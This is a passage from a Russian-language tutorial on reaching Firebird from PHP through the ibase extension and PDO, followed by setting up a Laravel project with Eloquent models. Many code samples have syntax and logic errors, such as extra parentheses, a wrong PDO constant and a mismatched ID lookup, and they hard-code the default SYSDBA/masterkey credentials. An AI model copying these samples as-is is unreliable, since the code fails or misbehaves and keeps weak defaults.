ibase_free_query($sth);
Подготовленные запросы гораздо чаще используются, когда необходима массовая заливка данных. $sql = 'INSERT INTO users(login, email) VALUES(?, ?)';
// Подготавливаем запрос
$sth = ibase_prepare($dbh, $sql);
$users = [["user1", "[email protected]"], ["user2", "[email protected]"]];
// Выполняем запрос
foreach ($users as $user)) {
ibase_execute($sth, $user[0], $user[1]);
}
// Освобождаем подготовленный запрос
ibase_free_query($sth);
По последнему примеру можно увидеть один из недостатков этого расширения, а именно, функции с переменным числом аргументов не очень удобны для параметризованных запросов. Этот недостаток проявляется особенно ярко, если вы пытаетесь написать универсальный класс для исполнения любых запросов. Гораздо удобнее было бы, если параметры можно было передавать одним массивом. Конечно, существуют обходные пути вроде вот такого: function fb_execute ($stmt, $data)
{
if (!is_array($data))
return ibase_execute($stmt, $data);
array_unshift($data, $stmt);
$rc = call_user_func_array('ibase_execute', $data);
return $rc;
}
Расширение Firebird/Interbase не работает с именованными параметрами запроса.
По умолчанию расширение Firebird/Interbase автоматически стартует транзакцию по умолчанию после подключения. Транзакцию по умолчанию подтверждается при закрытии соединения функцией ibase_close. Её можно подтвердить или откатить раньше, если вызвать методы ibase_commit или ibase_rollback передав в них идентификатор соединения, или не передавая ни чего (если вы используете единственное соединение.)
Если вам необходимо явное управление транзакциями, то необходимо стартовать транзакцию с помощью функции ibase_trans . Если параметры транзакции не указаны, то транзакция будет начата с параметрами IBASE_WRITE | IBASE_CONCURRENCY | IBASE_WAIT. Описание констант для задания параметров транзакции можно найти по ссылке php.net/manual/ru/ibase.constants.php . Транзакцию необходимо завершать с помощью метода ibase_commit или ibase_rollback передавая в эти функции идентификатор транзакции. Если вместо этих функций использовать функции ibase_commit_ret или ibase_rollback_ret, то транзакция будет завершаться как COMMIT RETAIN или ROLLBACK RETAIN. Замечание.
Умолчательные параметры транзакции подходят для большинства случаев. Дело в том что соединение с базой данных, как и все связанные с ним ресурсы существуют максимум до конца работы PHP скрипта. Даже если вы используете постоянные соединения, то все связанные ресурсы будут освобождены после вызова функции ibase_close. Несмотря на сказанное, настоятельно рекомендую завершать все выделенные ресурсы явно, вызывая соответствующие ibase_ функции.
Пользоваться функциями ibase_commit_ret и ibase_rollback_ret настоятельно не рекомендую, так как это не имеет смысла. COMMIT RETAIN и ROLLBACK RETAIN были введены для того, чтобы в настольных приложениях сохранять открытыми курсоры при завершении транзакции.
$sql = 'INSERT INTO users(login, email) VALUES(?, ?)';
// Подготавливаем запрос
$sth = ibase_prepare($dbh, $sql);
$users = [["user1", "[email protected]"], ["user2", "[email protected]"]];
$trh = ibase_trans($dbh, IBASE_WRITE | IBASE_CONCURRENCY | IBASE_WAIT);
try {
// Выполняем запрос
foreach ($users as $user)) {
$r = ibase_execute($sth, $user[0], $user[1]);
if ($r === false) {
// Если произошла ошибка, бросаем исключение
$err_msg = ibase_errmsg();
throw new \Exception($err_msg);
}
}
ibase_commit($trh);
}
catch(\Exception $e) {
ibase_rollback($trh);
echo $e->getMessage();
}
// Освобождаем подготовленный запрос
ibase_free_query($sth);
Внимание!
ibase функции не бросают исключение в случае возникновения ошибки. Часть функций возвращают false, если произошла ошибка. Обращаю ваше внимание, что результат сравнивать с false необходимо строгим оператором сравнения ===. Потенциально ошибка может возникнуть поле вызова любой ibase функции. Текст ошибки можно узнать с помощью функции ibase_errmsg. Код ошибки можно получить с помощью функции ibase_errcode.
Расширение Firebird/Interbase позволяет взаимодействовать с сервером Firebird не только посредством SQL запросов, но и используя Service API (см. функции ibase_service_attach, ibase_service_detach, ibase_server_info, ibase_maintain_db, ibase_db_info, ibase_backup, ibase_restore). Эти функции позволяют получить информацию о сервере Firebird, сделать резервное копирование, восстановление или получить статистику. Эта функциональность требуется в основном для администрирования БД, поэтому мы не будем рассматривать её подробно.
Расширение Firebird/Interbase так же поддерживает работу с событиями Firebird (см. функции ibase_set_event_handler, ibase_free_event_handler, ibase_wait_event). Обзор расширения PDO (драйвер Firebird)
Расширение PDO предоставляет обобщённый интерфейс для доступа к различным типам БД. Каждый драйвер базы данных, в котором реализован этот интерфейс, может представить специфичный для базы данных функционал в виде стандартных функций расширения.
PDO и все основные драйверы внедрены в PHP как загружаемые модули. Чтобы их использовать, требуется их просто включить, отредактировав файл php.ini следующим образом: extension=php_pdo.dll Замечание
Этот шаг необязателен для версий PHP 5.3 и выше, так как для работы PDO больше не требуются DLL.
Далее нужно выбрать DLL конкретных баз данных и либо загружать их во время выполнения функцией dl(), либо включить их в php.ini после php_pdo.dll. Например: extension=php_pdo.dll
extension=php_pdo_firebird.dll
Эти DLL должны лежать в директории extension_dir. Драйвер pdo_firebird требует, чтобы у вас была установлена клиентская библиотека fbclient.dll/gds32.dll (для UNIX подобных систем fbclient.so) соответствующей разрядности.
В Linux это расширение в зависимости от дистрибутива можно установить одной из следующих команд (необходимо уточнить поддерживаемые версии, возможно, необходимо подключить сторонний репозиторий): apt-get install php5-firebird
rpm –ihv php5-firebird
yum install php70w-firebird
zypper install php5-firebird
PDO использует объектно-ориентированный подход к написанию программ. Какой именно драйвер будет использоваться в PDO, зависит от строки подключения, называемой так же DSN (Data Source Name). DSN состоит из префикса, который и определяет тип базы данных, и набора параметров в виде = , разделённых точкой с запятой «;». Допустимый набор параметров зависит от типа базы данных. Для работы с Firebird строка подключения должна начинаться с префикса firebird: и иметь вид, описанный в документации в разделе PDO_FIREBIRD DSN .
Соединения устанавливаются автоматически при создании объекта PDO от его базового класса. Конструктор класса принимает аргументы для задания источника данных (DSN), а также необязательные имя пользователя и пароль (если есть). Четвёртым аргументом можно передать массив специфичных для драйвера настроек подключения в формате ключ=>значение. $dsn = 'firebird:dbname=localhost:example;charset=utf8;';
$username = 'SYSDBA';
$password = 'masterkey';
try {
// Подключение к БД
$dbh = new \PDO($dsn, $username, $password, [\PDO::ATTR_ERRMODE => \PDO::ERRMODE_EXCEPTION]);
$sql = 'SELECT login, email FROM users';
// Выполняем запрос
$query = $dbh->query($sql);
// Получаем результат построчно в виде объекта
while ($row = $query->fetch(\PDO::FETCH_OBJ)) {
echo $row->email, "\n";
}
$query->closeCursor(); // Закрываем курсор
} catch (\PDOException $e) {
echo $e->getMessage();
}
Установив свойство \PDO::ATTR_ERRMODE в значение \PDO::ERRMODE_EXCEPTION, мы установили режим, при котором любая ошибка, в том числе и ошибка при подключении к БД, будет возбуждать исключение \PDOException. Работать в таком режиме гораздо удобнее, чем проверять наличие ошибки после каждого вызова ibase_ функций. Для того чтобы PDO использовал постоянные соединения необходимо в конструктор PDO в массиве свойств передать PDO::ATTR_PERSISTENT => true.
Метод query выполняет SQL запрос и возвращает результирующий набор в виде объекта \PDOStatement. В этот метод помимо SQL запросы вы можете передать способ возвращения значений при фетче. Это может быть столбец, экземпляр заданного класса, объект. Различные способы вызова вы можете посмотреть по ссылке http://php.net/manual/ru/pdo.query.php .
Если необходимо выполнить SQL запрос, не возвращающий набор данных, то вы можете воспользоваться методом exec , который возвращает количество задействованных строк. Этот метод не обеспечивает выполнение подготовленных запросов.
Если в запросе используются параметры, то необходимо пользоваться подготовленными запросами. В этом случае вместо метода query необходимо вызвать метод prepare . Этот метод возвращает объект класса \PDOStatement, который инкапсулирует в себе методы для работы с подготовленными запросами и их результатами. Для выполнения запроса необходимо вызвать метод execute , который может принимать в качестве аргумента массив с именованными или неименованными параметрами. Результат выполнения селективного запроса можно получить с помощью методов fetch , fetchAll , fetchColumn , fetchObject . Методы fetch и fetchAll могут возвращать результаты в различном виде: ассоциативный массив, объект или экземпляр определённого класса. Последнее довольно часто используется в MVC паттерне при работе с моделями. $dsn = 'firebird:dbname=localhost:example;charset=utf8;';
$username = 'SYSDBA';
$password = 'masterkey';
try {
// Подключение к БД
$dbh = new \PDO($dsn, $username, $password, [\PDO::ATTR_ERRMODE => \PDO::ERRMODE_EXCEPTION]);
$sql = 'INSERT INTO users(login, email) VALUES(?, ?)';
$users = [
["user1", "[email protected]"],
["user2", "[email protected]"]
];
// Подготавливаем запрос
$query = $dbh->prepare($sql);
// Выполняем запрос
foreach ($users as $user)) {
$query->execute($user);
}
} catch (\PDOException $e) {
echo $e->getMessage();
}
Пример использования именованных параметров. $dsn = 'firebird:dbname=localhost:example;charset=utf8;';
$username = 'SYSDBA';
$password = 'masterkey';
try {
// Подключение к БД
$dbh = new \PDO($dsn, $username, $password, [\PDO::ATTR_ERRMODE => \PDO::ERRMODE_EXCEPTION]);
$sql = 'INSERT INTO users(login, email) VALUES(:login, :email)';
$users = [
[":login" => "user1", ":email" => "[email protected]"],
[":login" => "user2", ":email" => "[email protected]"]
];
// Подготавливаем запрос
$query = $dbh->prepare($sql);
// Выполняем запрос
foreach ($users as $user)) {
$query->execute($user);
}
} catch (\PDOException $e) {
echo $e->getMessage();
}
Замечание
Для поддержки именованных параметров PDO производит предобработку запроса и заменяет параметры вида :paramname на «?», сохраняя при этом массив соответствия между именем параметра и номерами его позиций в запросе. По этой причине оператор EXECUTE BLOCK не будет работать, если внутри него используются переменные маркированные двоеточием. На данный момент нет никакой возможности заставить работать PDO с оператором EXECUTE BLOCK иначе, например, задать альтернативный префикс параметров, как это сделано в некоторых компонентах доступа.
Передать параметры в запрос можно и другим способом, используя так называемое связывание. Метод bindValue привязывает значение к именованному или неименованному параметру. Метод bindParam привязывает переменную к именованному или неименованному параметру. Последний метод особенно полезен для хранимых процедур, которые возвращают значение через OUT или IN OUT параметр (в Firebird механизм возврата значений из хранимых процедур другой). $dsn = 'firebird:dbname=localhost:example;charset=utf8;';
$username = 'SYSDBA';
$password = 'masterkey';
try {
// Подключение к БД
$dbh = new \PDO($dsn, $username, $password, [\PDO::ATTR_ERRMODE => \PDO::ERRMODE_EXCEPTION]);
$sql = 'INSERT INTO users(login, email) VALUES(:login, :email)';
$users = [
["user1", "[email protected]"],
["user2", "[email protected]"]
];
// Подготавливаем запрос
$query = $dbh->prepare($sql);
// Выполняем запрос
foreach ($users as $user)) {
$query->bindValue(":login", $user[0]);
$query->bindValue(":email", $user[1]);
$query->execute();
}
} catch (\PDOException $e) {
echo $e->getMessage();
}
Внимание
Нумерация неименованных параметров в методах bindParam и bindValue начинается с 1.
$dsn = 'firebird:dbname=localhost:example;charset=utf8;';
$username = 'SYSDBA';
$password = 'masterkey';
try {
// Подключение к БД
$dbh = new \PDO($dsn, $username, $password, [\PDO::ATTR_ERRMODE => \PDO::ERRMODE_EXCEPTION]);
$sql = 'INSERT INTO users(login, email) VALUES(?, ?)';
$users = [
["user1", "[email protected]"],
["user2", "[email protected]"]
];
// Подготавливаем запрос
$query = $dbh->prepare($sql);
// Выполняем запрос
foreach ($users as $user)) {
$query->bindValue(1, $user[0]);
$query->bindValue(2, $user[1]);
$query->execute();
}
} catch (\PDOException $e) {
echo $e->getMessage();
}
По умолчанию PDO автоматически подтверждает транзакцию после выполнения каждого SQL запроса, если вам необходимо явное управление транзакциями, то необходимо стартовать транзакцию с помощью метода \PDO::beginTransaction . По умолчанию транзакция стартует с параметрами CONCURRENCY | WAIT | READ_WRITE. Завершить транзакцию можно методом \PDO::commit или \PDO::rollback . $dsn = 'firebird:dbname=localhost:example;charset=utf8;';
$username = 'SYSDBA';
$password = 'masterkey';
try {
// Подключение к БД
$dbh = new \PDO($dsn, $username, $password, [\PDO::ATTR_ERRMODE => \PDO::ERRMODE_EXCEPTION]);
// Стартуем транзакцию для обеспечения согласованности между запросами
$dbh->beginTransaction();
// Получаем пользователей из одной таблицы
$users_stmt = $dbh->prepare('SELECT login, email FROM old_users');
$users_stmt->execute();
$users = $users_stmt->fetchAll(\PDO::FETCH_OBJECT);
$users_stmt->closeCursor();
// И переносим их в другую
$sql = 'INSERT INTO users(login, email) VALUES(?, ?)';
// Подготавливаем запрос
$query = $dbh->prepare($sql);
// Выполняем запрос
foreach ($users as $user)) {
$query->bindValue(1, $user->LOGIN);
$query->bindValue(2, $user->EMAIL]);
$query->execute();
}
// Подтверждаем транзакцию
$dbh->commit();
} catch (\PDOException $e) {
// Если соединение произошло и транзакция стартовала, откатываем её
if ($dbh && $dbh->inTransaction())
$dbh->rollback();
echo $e->getMessage();
}
К сожалению метод beginTransaction не предоставляет возможности изменить параметры транзакции, однако вы можете сделать хитрый трюк, задав параметры транзакции оператором SET TRANSACTION. $dbh = new \PDO($dsn, $username, $password);
$dbh->setAttribute(\PDO::ATTR_AUTOCOMMIT, false);
$dbh->exec("SET TRANSACTION READ ONLY ISOLATION LEVEL READ COMMITTED NO WAIT");
// Выполняем действия в транзакции
// ….
$dbh->exec("COMMIT");
$dbh->setAttribute(\PDO::ATTR_AUTOCOMMIT, true);
Ниже представлена сводная таблица возможностей различных драйверов для работы с Firebird. Возможность
Расширение Firebird/Interbase
PDO
Парадигма программирования
Функциональная
Объектно-ориентированная
Поддерживаемые БД
Firebird, Interbase, Yaffil и другие клоны Interbase.
Любая БД, для которой существует PDO драйвер, в том числе Firebird.
Работа с параметрами запросов
Только неименованные параметры, работать не очень удобно, поскольку используется функция с переменным числом аргументов.
Есть возможность работать как с именованными, так и неименованными параметрами. Работать очень удобно, однако некоторые возможности Firebird (оператор EXECUTE BLOCK) не работают.
Обработка ошибок
Проверка результата функций ibase_errmsg, ibase_errcode. Ошибка может произойти после вызова любой ibase функции при этом исключение не будет возбуждено.
Есть возможность установить режим, при котором любая ошибка приведёт к возбуждению исключения.
Управление транзакциями
Даёт возможность задать параметры транзакции.
Не даёт возможность задать параметры транзакции. Есть обходной путь через выполнение оператора SET TRANSACTION.
Специфичные возможности Interbase/Firebird
Есть возможность работать с расширениями Service API (backup, restore, получение статистики и т.д.), а также с событиями базы данных.
Не позволяет использовать специфичные возможности, с которыми невозможно работать, используя SQL.
Из приведённой таблицы видно, что большинству фреймворков гораздо удобнее пользоваться PDO. Выбор фреймворка для построения WEB приложения
Небольшие web сайты можно писать, не используя паттерн MVC. Однако чем больше становится ваш сайт, тем сложнее его поддерживать, особенно если над ним работает не один человек. Поэтому при разработке нашего web приложения сразу договоримся об использовании этого паттерна.
Итак, мы решили использовать паттерн MVC. Однако написание приложение с использованием этого паттерна не такая простая задача как кажется, особенно если мы не пользуемся сторонними библиотеками. Если всё писать самому, то необходимо решить множество задач: автозагрузка файлов .php, включающих определение классов, маршрутизация и др. Для решения этих задач было создано большое количество фреймворков, например Yii, Laravel, Symphony, Kohana и многие другие. Лично мне нравится Laravel, поэтому далее я буду описывать создание приложения с использованием этого фреймворка. Установка Laravel и создание проекта
Прежде чем устанавливать Laravel вам необходимо убедится, что ваше системное окружение соответствует требованиям. PHP >= 5.5.9
PDO расширение для PHP (для версии 5.1+)
MCrypt расширение для PHP (для версии 5.0)
OpenSSL (расширение для PHP)
Mbstring (расширение для PHP)
Tokenizer (расширение для PHP)
Laravel использует Composer для управления зависимостями. Поэтому сначала установите Composer, а затем Laravel.
Самый простой способ установить composer под windows – это скачать и запустить инсталлятор Composer-Setup.exe . Инсталлятор установит Composer и настроит PATH, так что вы можете вызвать Composer из любой директории в командной строке.
Если необходимо установить Composer вручную, то необходимо запустить Скрипт уcтановки Composer php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');"
php -r "if (hash_file('SHA384', 'composer-setup.php') === 'aa96f26c2b67226a324c27919f1eb05f21c248b987e6195cad9690d5c1ff713d53020a02ac8c217dbf90a7eacc9d141d') { echo 'Installer verified'; } else { echo 'Installer corrupt'; unlink('composer-setup.php'); } echo PHP_EOL;"
php composer-setup.php
php -r "unlink('composer-setup.php');"
Этот скрипт осуществляет следующие действия: Скачивает инсталлятор в текущую директорию
Проверяет инсталлятор с помощью SHA-384
Запускает скрипт инсталляции
Удаляет скрипт инсталляции
После запуска этого скрипта у вас появится файл composer.phar (phar – это архив) — по сути это PHP скрипт, который может принимать несколько команд (install, update, ...) и умеет скачивать и распаковывать библиотеки. Если вы работаете под windows, то вы можете облегчить себе задачу, создав файл composer.bat и поместив его в PATH. Для этого необходимо выполнить команду echo @php "%~dp0composer.phar" %*>composer.bat
Подробнее об установке composer смотри здесь .
Теперь устанавливаем сам Laravel: composer global require "laravel/installer"
Если установка прошла успешно, то приступаем к созданию каркаса проекта. laravel new fbexample
Ждём завершения, после чего у нас будет создан каркас проекта. Описание структуры каталогов можно найти в документации по Laravel. Нас будут интересовать следующие каталоги: app – основной каталог нашего приложения. В корне каталога будут размещены модели. В подкаталоге Http находится все, что касается работы с браузером. В подкаталоге Http/Controllers – наши контроллеры.
config – каталог файлов конфигурации. Подробней о конфигурировании будет написано ниже.
public – корневой каталог web приложения (DocumentRoot). Содержит статические файлы — css, js, изображения и т.п.
resources — здесь находятся шаблоны (Views), файлы локализации и, если таковые имеются, рабочие файлы LESS, SASS и js-приложения на фреймворках типа ReactJS, AngularJS или Ember, которые потом собираются внешним инструментом в папку public.
В корне папки нашего приложения есть файл composer.json, который описывает, какие пакеты, потребуются нашему приложению помимо тех, что уже есть в Laravel. Нам потребуется два таких пакета: « zofe/rapyd-laravel » — для быстрого построения интерфейса с сетками (grids) и диалогами редактирования, и « sim1984/laravel-firebird » — расширение для работы с СУБД Firebird. Пакет «sim1984/laravel-firebird» является форком пакета «jacquestvanzuydam/laravel-firebird» поэтому его установка несколько отличается (описание отличий пакета от оригинального вы можете найти в статье « Пакет для работы с СУБД Firebird в Laravel »). Не забудьте установить параметр minimum-stability равный dev, так как пакет не является стабильным, а так же добавить ссылки на репозиторий. …
"repositories": [
{
"type": "package",
"package": {
"version": "dev-master",
"name": "sim1984/laravel-firebird",
"source": {
"url": "https://github.com/sim1984/laravel-firebird",
"type": "git",
"reference": "master"
},
"autoload": {
"classmap": [""]
}
}
}
],
…
В секции require добавьте требуемые пакеты следующим образом: "zofe/rapyd": "2.2.*",
"sim1984/laravel-firebird": "dev-master"
Теперь можно запустить обновление пакетов командой (запускать надо в корне веб приложения) composer update
После выполнения этой команды новые пакеты будут установлены в ваше приложение. Теперь можно приступить к настройке. Для начала выполним команду php artisan vendor:publish
которая создаст дополнительные файлы конфигурации для пакета zofe/rapyd.
В файле config/app.php добавим два новых провайдера. Для этого добавим две новых записи в ключ providers Zofe\Rapyd\RapydServiceProvider::class,
Firebird\FirebirdServiceProvider::class,
Теперь перейдём к файлу config/databases.conf, который содержит настройки подключения к базе данных. Добавим в ключ connections следующие строки 'firebird' => [
'driver' => 'firebird',
'host' => env('DB_HOST', 'localhost'),
'port' => env('DB_PORT', '3050'),
'database' => env('DB_DATABASE', 'examples'),
'username' => env('DB_USERNAME', 'SYSDBA'),
'password' => env('DB_PASSWORD', 'masterkey'),
'charset' => env('DB_CHARSET', 'UTF8'),
'engine_version' => '3.0.0',
],
Поскольку мы будем использовать наше подключение в качестве подключения по умолчанию, установим следующее 'default' => env('DB_CONNECTION', 'firebird'),
Обратите внимание на функцию env, которая используется для чтения переменных окружения приложения из специального файла .env, находящегося в корне проекта. Исправим в этом файле .env следующие строки DB_CONNECTION=firebird
DB_HOST=localhost
DB_PORT=3050
DB_DATABASE=examples
DB_USERNAME=SYSDBA
DB_PASSWORD=masterkey
В файле конфигурации config/rapid.php изменим отображение дат так, чтобы они были в формате принятом в России: 'fields' => [
'attributes' => ['class' => 'form-control'],
'date' => [
'format' => 'd.m.Y',
],
'datetime' => [
'format' => 'd.m.Y H:i:s',
'store_as' => 'Y-m-d H:i:s',
],
],
Первоначальная настройка закончена, теперь мы можем приступить непосредственно к написанию логики web приложения. Создание моделей
Фреймворк Laravel поддерживает ORM Eloquent. ORM Eloquent — красивая и простая реализация паттерна ActiveRecord для работы с базой данных. Каждая таблица имеет соответствующий класс-модель, который используется для работы с этой таблицей. Модели позволяют читать данные из таблиц и записывать данные в таблицу.
Создадим модель заказчиков, для упрощения этого процесса в Laravel есть artisan команда. php artisan make:model Customer
Этой командой мы создаём шаблон модели. Теперь изменим нашу модель так, чтобы она выглядела следующим образом: namespace App;
use Firebird\Eloquent\Model;
class Customer extends Model
{
/**
* Таблица, связанная с моделью
*
* @var string
*/
protected $table = 'CUSTOMER';
/**
* Первичный ключ модели
*
* @var string
*/
protected $primaryKey = 'CUSTOMER_ID';
/**
* Наша модель не имеет временной метки
*
* @var bool
*/
public $timestamps = false;
/**
* Имя последовательности для генерации первичного ключа
* @var string
*/
protected $sequence = 'GEN_CUSTOMER_ID';
}
Обратите внимание, мы используем модифицированную модель Firebird\Eloquent\Model из пакета sim1984/laravel-firebird в качестве базовой. Она позволяет воспользоваться последовательностью, указанной в свойстве $sequence, для генерирования значения идентификатора первичного ключа.
По аналогии создадим модель товаров – Product. Модель Product namespace App;
use Firebird\Eloquent\Model;
class Product extends Model
{
/**
* Таблица, связанная с моделью
*
* @var string
*/
protected $table = 'PRODUCT';
/**
* Первичный ключ модели
*
* @var string
*/
protected $primaryKey = 'PRODUCT_ID';
/**
* Наша модель не имеет временной метки
*
* @var bool
*/
public $timestamps = false;
/**
* Имя последовательности для генерации первичного ключа
* @var string
*/
protected $sequence = 'GEN_PRODUCT_ID';
}
Теперь создадим модель для шапки счёт-фактуры. Модель Invoice namespace App;
use Firebird\Eloquent\Model;
class Invoice extends Model {
/**
* Таблица, связанная с моделью
*
* @var string
*/
protected $table = 'INVOICE';
/**
* Первичный ключ модели
*
* @var string
*/
protected $primaryKey = 'INVOICE_ID';
/**
* Наша модель не имеет временной метки
*
* @var bool
*/
public $timestamps = false;
/**
* Имя последовательности для генерации первичного ключа
*
* @var string
*/
protected $sequence = 'GEN_INVOICE_ID';
/**
* Заказчик
*
* @return \App\Customer
*/
public function customer() {
return $this->belongsTo('App\Customer', 'CUSTOMER_ID');
}
/**
* Позиции счёт фактуры
* @return \App\InvoiceLine[]
*/
public function lines() {
return $this->hasMany('App\InvoiceLine', 'INVOICE_ID');
}
/**
* Оплата
*/
public function pay() {
$connection = $this->getConnection();
$attributes = $this->attributes;
$connection->executeProcedure('SP_PAY_FOR_INOVICE', [$attributes['INVOICE_ID']]);
}
}
В этой модели можно заметить несколько дополнительных функций. Функция customer возвращает заказчика связанного со счёт фактурой через поле CUSTOMER_ID. Для осуществления такой связи используется метод belongsTo, в который передаются имя класса модели и имя поле связи. Функция lines возвращают позиции счёт-фактуры, которые представлены коллекцией моделей InvoiceLine (будет описана далее). Для осуществления связи один ко многим в функции lines используется метод hasMany, в который передаётся имя класса модели и поле связи. Подробнее о задании отношений между сущностями вы можете почитать в разделе Отношения документации Laravel.
Функция pay осуществляет оплату счёт фактуры. Для этого вызывается хранимая процедура SP_PAY_FOR_INVOICE. В неё передаётся идентификатор счёт фактуры. Значение любого поля (атрибута модели) можно получить из свойства attributes. Вызов хранимой процедуры осуществляется с помощью метода executeProcedure. Этот метод доступен только при использовании расширения sim1984/laravel-firebird.
Теперь создадим модель для позиций счёт фактуры. Модель InvoiceLine namespace App;
use Firebird\Eloquent\Model;
use Illuminate\Database\Eloquent\Builder;
class InvoiceLine extends Model {
/**
* Таблица, связанная с моделью
*
* @var string
*/
protected $table = 'INVOICE_LINE';
/**
* Первичный ключ модели
*
* @var string
*/
protected $primaryKey = 'INVOICE_LINE_ID';
/**
* Наша модель не имеет временной метки
*
* @var bool
*/
public $timestamps = false;
/**
* Имя последовательности для генерации первичного ключа
*
* @var string
*/
protected $sequence = 'GEN_INVOICE_LINE_ID';
/**
* Массив имён вычисляемых полей
*
* @var array
*/
protected $appends = ['SUM_PRICE'];
/**
* Товар
*
* @return \App\Product
*/
public function product() {
return $this->belongsTo('App\Product', 'PRODUCT_ID');
}
/**
* Сумма по позиции
*
* @return double
*/
public function getSumPriceAttribute() {
return $this->SALE_PRICE * $this->QUANTITY;
}
/**
* Добавление объекта модели в БД
* Переопределяем этот метод, т.к. в данном случаем мы работаем с помощью ХП
*
* @param \Illuminate\Database\Eloquent\Builder $query
* @param array $options
* @return bool
*/
protected function performInsert(Builder $query, array $options = []) {
if ($this->fireModelEvent('creating') === false) {
return false;
}
$connection = $this->getConnection();
$attributes = $this->attributes;
$connection->executeProcedure('SP_ADD_INVOICE_LINE', [
$attributes['INVOICE_ID'],
$attributes['PRODUCT_ID'],
$attributes['QUANTITY']
]);
// We will go ahead and set the exists property to true, so that it is set when
// the created event is fired, just in case the developer tries to update it
// during the event. This will allow them to do so and run an update here.
$this->exists = true;
$this->wasRecentlyCreated = true;
$this->fireModelEvent('created', false);
return true;
}
/**
* Сохранение изменений текущего экземпляра модели в БД
* Переопределяем этот метод, т.к. в данном случаем мы работаем с помощью ХП
*
* @param \Illuminate\Database\Eloquent\Builder $query
* @param array $options
* @return bool
*/
protected function performUpdate(Builder $query, array $options = []) {
$dirty = $this->getDirty();
if (count($dirty) > 0) {
// If the updating event returns false, we will cancel the update operation so
// developers can hook Validation systems into their models and cancel this
// operation if the model does not pass validation. Otherwise, we update.
if ($this->fireModelEvent('updating') === false) {
return false;
}
$connection = $this->getConnection();
$attributes = $this->attributes;
$connection->executeProcedure('SP_EDIT_INVOICE_LINE', [
$attributes['INVOICE_LINE_ID'],
$attributes['QUANTITY']
]);
$this->fireModelEvent('updated', false);
}
}
/**
* Удаление текущего экземпляра модели в БД
* Переопределяем этот метод, т.к. в данном случаем мы работаем с помощью ХП
*
* @return void
*/
protected function performDeleteOnModel() {
$connection = $this->getConnection();
$attributes = $this->attributes;
$connection->executeProcedure('SP_DELETE_INVOICE_LINE',
[$attributes['INVOICE_LINE_ID']]);
}
}
В этой модели есть функция product, которая возвращает продукт (модель App/Product), указанный в позиции счёт фактуры. Связь осуществляется по полю PRODUCT_ID с помощью метода belongsTo.
Вычисляемое поле SumPrice вычисляется с помощью функции getSumPriceAttribute. Для того чтобы это вычисляемое поле было доступно в модели, его имя должно быть указано в массиве имён вычисляемых полей $appends.
В этой модели мы переопределили операции insert, update и delete так, чтобы они выполнялись, используя хранимые процедуры. Эти хранимые процедуры помимо собственно операций вставки, редактирования и удаления пересчитывают сумму в шапке накладной. Этого можно было бы и не делать, но тогда пришлось бы выполнять в одной транзакции модификацию нескольких моделей. Как это сделать будет показано далее.
Теперь немного поговорим о том, как работать с моделями в Laravel для выборки, вставки, редактирования и удаления данных. Laravel оперирует данными с помощью конструктора запросов. Полное описание синтаксиса и возможностей этого конструктора вы можете найти по ссылке . Например, для получения всех строк поставщиков вы можете выполнить следующий запрос $customers = DB::table('CUSTOMER')->get();
Этот конструктор запросов является довольно мощным средством для построения и выполнения SQL запросов. Вы можете выполнять также фильтрация, сортировку и соединения таблиц, например DB::table('users')
->join('contacts', function ($join) {
$join->on('users.id', '=', 'contacts.user_id')->orOn(...);
})
->get();
Однако гораздо удобнее работать с использованием моделей. Описание моделей Eloquent ORM и синтаксиса запроса к ним можно найти по ссылке laravel.ru/docs/v5/eloquent . Так для получения всех элементов коллекции поставщиков необходимо выполнить следующий запрос $customers = Customer::all();
Следующий запрос вернёт первые 20 поставщиков отсортированных по алфавиту. $customers = App\Customer::select()
->orderBy('name')
->take(20)
->get();
Для сложных моделей связанные отношения или коллекции отношений могут быть получены через динамические атрибуты. Например, следующий запрос вернёт позиции счёт-фактуры с идентификатором 1. $lines = Invoice::find(1)->lines;
Добавление записей осуществляется через создание экземпляра модели, инициализации его свойств и сохранение модели с помощью метода save. $flight = new Flight;
$flight->name = $request->name;
$flight->save();
Для изменения запись её необходимо найти, изменить необходимые атрибуты и сохранить методом save. $flight = App\Flight::find(1);
$flight->name = 'New Flight Name';
$flight->save();
Для удаления записи её необходимо найти и вызвать метод delete. $flight = App\Flight::find(1);
$flight->delete();
Удалить запись по ключу можно и гораздо быстрее с помощью метода destroy. В этом случае можно удалить модель не получая её экземпляр. App\Flight::destroy(1);
Существуют и другие способы удаления записей, например «мягкое» удаление. Подробно о способах удаления вы можете прочитать по ссылке .
Теперь поговорим немного о транзакциях. Что это такое я рассказывать не буду, а лишь покажу, как их можно использовать совместно с Eloquent ORM. DB::transaction(function () {
// Создаём новую позицию в счёт фактуре
$line = new App\InvoiceLine();
$line->CUSTOMER_ID = 45;
$line->PRODUCT_ID = 342;
$line->QUANTITY = 10;
$line->COST = 12.45;
$line->save();
// добавляем сумму позиции по строке к сумме накладной
$invoice = App\Invoice::find($line->CUSTOMER_ID);
$invoice->INVOICE_SUM += $line->SUM_PRICE;
$invoice->save();
});
Всё что находится в функции обратного вызова, которая является аргументом метода transaction, выполняется в рамках одной транзакции. Создание контроллеров и настройка маршрутизации
Фреймворк Laravel имеет мощную подсистему маршрутизации. Вы можете отображать ваши маршруты, как на простые функции обратного вызова, так и на методы контроллеров. Простейшие примеры маршрутов выглядят вот так Route::get('/', function () {
return 'Hello World';
});
Route::post('foo/bar', function () {
return 'Hello World';
});
В первом случае мы регистрируем обработчик GET запроса для корня сайта, во втором – для POST запроса с маршрутом /foo/bar.
Вы можете зарегистрировать маршрут сразу на несколько типов HTTP запросов, например Route::match(['get', 'post'], 'foo/bar', function () {
return 'Hello World';
});
Из маршрута можно извлекать часть адреса и использовать его в качестве параметров функции-обработчика Route::get('posts/{post}/comments/{comment}', function ($postId, $commentId) {
//
});
Параметры маршрута всегда заключаются в фигурные скобки. Подробнее о возможности настройки маршрутизации вы можете посмотреть в документации глава « Маршрутизация ». Маршруты настраиваются в файле app/Http/routes.php в Laravel 5.2 и routes/wep.php в Laravel 5.3.
Вместо того чтобы описывать обработку всех запросов в едином файле маршрутизации, мы можем организовать её использую классы Controller, которые позволяют группировать связанные обработчики запросов в отдельные классы. Контроллеры хранятся в папке app/Http/Controllers.
Все Laravel контроллеры должны расширять базовый класс контроллера App\Http\Controllers\Controller, присутствующий в Laravel по умолчанию. Подробнее о написании контроллеров вы можете почитать в документации в главе HTTP-Контроллеры .
Напишем наш первый контроллер. /*
* Контроллер заказчиков
*/
namespace App\Http\Controllers;
use App\Http\Controllers\Controller;
use App\Customer;
class CustomerController extends Controller
{
/**
* Отображает список заказчиков
*
* @return Response
*/
public function showCustomers()
{
